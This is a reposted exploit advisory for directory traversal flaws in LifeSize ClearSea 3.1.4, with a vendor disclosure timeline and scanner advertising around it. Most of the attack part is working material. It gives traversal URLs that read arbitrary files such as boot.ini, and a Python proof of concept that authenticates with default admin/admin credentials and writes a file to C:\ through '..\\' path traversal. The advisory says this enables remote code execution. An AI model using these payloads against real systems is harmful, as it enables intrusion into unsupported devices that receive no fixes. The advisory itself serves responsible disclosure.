lifesize clearsea 3.1.4 directory traversal

▸▸▸ Exploit & Vulnerability >>   webapps exploit & windows vulnerability




lifesize clearsea 3.1.4 directory traversal Code Code...
				
''' Tittle: LifeSize ClearSea 3.1.4 Directory Traversal Vulnerabilities Author: rsp3ar <lukunming@gmail.com> Impact: Remote Code Execution (Post-Authentication) Recommendation: Use strong password for default 'admin' user and secure management access to the device. Please consult vendor for replacement/alternative solutions. Timeline: - 01.29.2018: Open Case 00302227 to notify the vulnerabilities. - 01.30.2018: Got notified product is EoL as Jan 14 2017 and no longer supported. - 02.05.2018: Open Case 00302876 to notify the intention of disclosure. - 03.02.2018: Notify the tentative date for disclosure. - 03.07.2018: Contacted by LifeSize and discussed the detail of vulnerabilities & discloure. - 03.31.2018: Public Disclosure Description ======================================== LifeSize ClearSea is a client/server solution for desktop and mobile video collaboration. Version 3.1.4 has been End of Life since Jan 14 2017, and suffers from directory traversal vulnerabilities. After authenticated as admin on Control Panel, attacker will be able to 1) Download arbitrary file; 2) Upload arbitrary file (leading to code execution). 1. Arbitrary file (boot.ini) download via directory traversal vulnerabilities http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=CDRS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=LOGS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini 2. Arbitrary file upload Below POC will create test.txt under C:\ ''' #!/usr/bin/env python import sys import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'RSA+AESGCM:RSA+AES:RC4-SHA' requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Update target URL and credentials TARGET = "http://127.0.0.1:8800/" USERNAME = "admin" PASSWORD = "admin" LOGIN_PATH = "smartgui/" UPLOAD_PATH = "smartgui/upload/-m-ClearSea-c-DHP_PKG_UPLOAD_FORM-w-filename/cfcyvcffiv/" TEST_FILE_NAME = "test.txt" print("[*] Authenticate with %s..." % (TARGET)) cookies = {} # Get rootSessionID r = requests.get(TARGET, verify=False) cookies["rootSessionID"] = r.cookies["rootSessionID"] # Get smartguiSessionID auth_data = { "smartGuiAuthenticate": "t", "email": USERNAME, "password": PASSWORD } r = requests.post(TARGET + LOGIN_PATH, data = auth_data, cookies = cookies, verify=False) if r.cookies.get("smartguiSessionID") == None: print("[!] Invalid Username or Password") sys.exit() cookies["smartguiSessionID"] = r.cookies["smartguiSessionID"] print("[*] Authentication is successful!") print("[*] Create remote file C:\\%s..." % (TEST_FILE_NAME)) files = { "SmartGuiUploadField": (TEST_FILE_NAME, "This is a test file") } r = requests.post(TARGET + UPLOAD_PATH + "..\\" * 8 + TEST_FILE_NAME, files = files, cookies = cookies, verify=False) if r.status_code == requests.codes.ok: print("[*] Remote file C:\\%s has been successfully created" % (TEST_FILE_NAME))

Lifesize clearsea 3.1.4 directory traversal Vulnerability / Exploit Source : Lifesize clearsea 3.1.4 directory traversal



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.